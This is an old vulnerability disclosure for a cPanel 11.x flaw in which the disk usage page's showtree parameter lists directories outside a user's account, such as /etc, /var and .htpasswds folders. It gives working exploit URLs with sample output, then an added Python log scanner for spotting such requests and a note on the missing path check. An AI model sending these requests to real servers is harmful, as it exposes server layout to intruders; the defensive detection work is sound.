cPanel version 11.x suffers from a vulnerability that allows the viewing of directories and folders.
Hello
I discovered a new bug that shows the directories (folders only) on the server.
For example, I tried to see the folders in /etc
and it worked!
Exploit:
http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/etc
Now you will see only the folders that are inside /etc.
Example:
Directory Space Used
etc/Pegasus 0.00 Meg
etc/X11 0.07 Meg
etc/X11/applnk 0.00 Meg
etc/X11/fs 0.00 Meg
etc/X11/serverconfig 0.00 Meg
etc/X11/starthere 0.03 Meg
etc/X11/sysconfig 0.00 Meg
...etc
Another example, to see the folders in /var:
http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/var
That will show you the folders inside /var, like:
var/www/cgi-bin 0.00 Meg
var/www/error 0.19 Meg
var/www/error/include 0.01 Meg
var/www/html 0.00 Meg
var/www/icons 0.89 Meg
var/www/icons/small 0.25 Meg
var/yp 0.02 Meg
var/yp/binding 0.00 Meg
...etc
Another example: you can see the folders which are protected by a firewall.
For example, if you type:
http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/home/user/.htpasswds
you will see all the folders which have a firewall,
like:
home/user/.htpasswds/public_html 0.01 Meg
home/user/.htpasswds/public_html/admin 0.00 Meg
home/user/.htpasswds/public_html/admin/login 0.00 Meg
Tested on: cPanel version 11.18.3
Discovered By Linux_Drox
Best Regards
L-G-H TEAM
LeZr.Com
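For defenders, requests of the shape shown in this advisory can be found in the panel's access log. The following is an added example, not part of the original advisory and not cPanel code. It assumes a Common Log Format access log with the authenticated account in the third field, account homes under /home/<user>, and that a relative showtree value is resolved against the account home; the log lines are constructed.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Assumed layout (Common Log Format): host ident authuser [time] "METHOD target PROTO" status
CLF = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" \d{3}')
DISKUSAGE = re.compile(r"^/frontend/[^/]+/diskusage/index\.html$")

# Constructed sample lines (documentation IP ranges, made-up users and timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - alice [10/Mar/2008:12:00:01 -0500] "GET /frontend/x/diskusage/index.html?showtree=/etc HTTP/1.1" 200 5120',
    '203.0.113.7 - alice [10/Mar/2008:12:00:09 -0500] "GET /frontend/x/diskusage/index.html?showtree=%2Fvar HTTP/1.1" 200 4096',
    '198.51.100.4 - bob [10/Mar/2008:12:01:30 -0500] "GET /frontend/x/diskusage/index.html?showtree=/home/bob/public_html HTTP/1.1" 200 2048',
    '198.51.100.4 - bob [10/Mar/2008:12:01:44 -0500] "GET /frontend/x/diskusage/index.html?showtree=/home/bob/.htpasswds HTTP/1.1" 200 1024',
    '198.51.100.4 - bob [10/Mar/2008:12:02:02 -0500] "GET /frontend/x/index.html HTTP/1.1" 200 900',
]

def classify(line, home_root="/home"):
    """Return (client, user, path, reason) for a suspicious showtree request, else None."""
    m = CLF.match(line)
    if not m:
        return None
    client, user, target = m.groups()
    url = urlsplit(target)
    if not DISKUSAGE.match(url.path):
        return None
    values = parse_qs(url.query).get("showtree")  # parse_qs percent-decodes the value
    if not values:
        return None
    home = posixpath.join(home_root, user)
    # Collapse repeated leading slashes first: normpath would otherwise keep "//etc".
    value = re.sub(r"^/+", "/", values[0])
    path = posixpath.normpath(posixpath.join(home, value))
    if path != home and not path.startswith(home + "/"):
        return (client, user, path, "outside-home")
    if ".htpasswds" in path.split("/"):
        return (client, user, path, "htpasswds")
    return None

def scan(lines):
    """Return every suspicious request found in an iterable of log lines."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

The same containment test (normalise the path, then require it to sit under the account's home) is the check the disk usage page would need to apply to showtree before listing anything.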